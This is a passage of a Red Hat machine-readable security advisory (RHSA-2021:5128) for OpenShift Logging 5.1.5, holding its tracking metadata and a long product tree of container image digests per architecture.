"category": "external",
"summary": "LOG-1971",
"url": "https://issues.redhat.com/browse/LOG-1971"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5128.json"
}
],
"title": "Red Hat Security Advisory: Openshift Logging security and bug update (5.1.5)",
"tracking": {
"current_release_date": "2024-12-12T01:17:02+00:00",
"generator": {
"date": "2024-12-12T01:17:02+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5128",
"initial_release_date": "2021-12-14T18:09:12+00:00",
"revision_history": [
{
"date": "2021-12-14T18:09:12+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T18:09:12+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:02+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "OpenShift Logging 5.1",
"product": {
"name": "OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:logging:5.1::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"product_id": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"product_id": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"product_id": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"product_id": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"product": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.1.5-9"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"product": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.1.5-10"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64"
},
"product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64"
},
"product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le"
},
